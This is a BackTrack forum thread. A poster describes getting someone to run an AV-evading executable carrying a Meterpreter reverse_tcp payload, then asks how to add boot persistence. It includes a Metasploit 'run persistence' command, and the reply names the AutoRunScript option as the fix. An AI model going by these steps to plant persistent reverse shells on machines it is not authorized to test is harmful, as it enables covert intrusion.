Results 1 to 3 of 3

Thread: Metasploit: Include persistence/autostart backdoor in executable?

  1. #1
    Just burned their ISO
    Join Date
    Mar 2009
    Posts
    20

    Default Metasploit: Include persistence/autostart backdoor in executable?

    Dear fellow Backtrackers,

    I hope someone knows the answer to my question:

    Is it possible to integrate metasploits persistence module into an executable that includes a meterpreter reverse_tcp payload? So that it establishes a meterpreter-session when executed AND installs a backdoor to startup on system-start again?

    The background:
    I successfully social engineered my "victim" to run an example.exe from an usb drive, that included the meterpreter payload and was self-encoded in a way the AV didn't detect it. My Backtrack-machine was part of the local network and listening for the incoming meterpreter-session, which it established once the example.exe got excecuted. But: The situation required me to stay with the person running the "victim"-machine for a long time, and when I got back to Backtrack, the session was already closed because the "victim"-machine was shut down.

    If the session was still up, I had used
    Code:
    run persistence -A -X -i [time in secs] -p [open port]
    to achieve persistence on the machine, so that it would connect back to me when the computer gets started again. But since I had no chance to run the code, because of the system being shut down before I got back to the meterpreter-session, the test failed. That's why I ask if there's a way to include persistence in the .exe, to save the time I would need to run the persistence code in my meterpreter-session.

    I'm looking forward to your tips,

    Carnivore

  2. #2
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Metasploit: Include persistence/autostart backdoor in executable?

    Look at AutoRunScript under payload advanced options.

  3. #3
    Just burned their ISO
    Join Date
    Mar 2009
    Posts
    20

    Default Re: Metasploit: Include persistence/autostart backdoor in executable?

    Thank you, that solved the problem!

Similar Threads

  1. Custom executable (but not generated by Metasploit) as payload
    By Ignatius in forum BackTrack 5 General Topics
    Replies: 1
    Last Post: 02-18-2012, 03:23 PM
  2. Metasploit persistence error...
    By jis2507 in forum Beginners Forum
    Replies: 3
    Last Post: 02-12-2011, 04:36 AM
  3. Metasploit msfpayload | using an existing executable?
    By dragon6 in forum Beginners Forum
    Replies: 5
    Last Post: 04-15-2010, 02:47 PM
  4. Building a meterpreter executable (Metasploit)
    By stove937 in forum OLD Newbie Area
    Replies: 6
    Last Post: 12-05-2009, 01:56 PM
  5. Ettercap/Metasploit and netcat for backdoor
    By overide in forum OLD Tutorials and Guides
    Replies: 3
    Last Post: 10-03-2008, 02:54 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •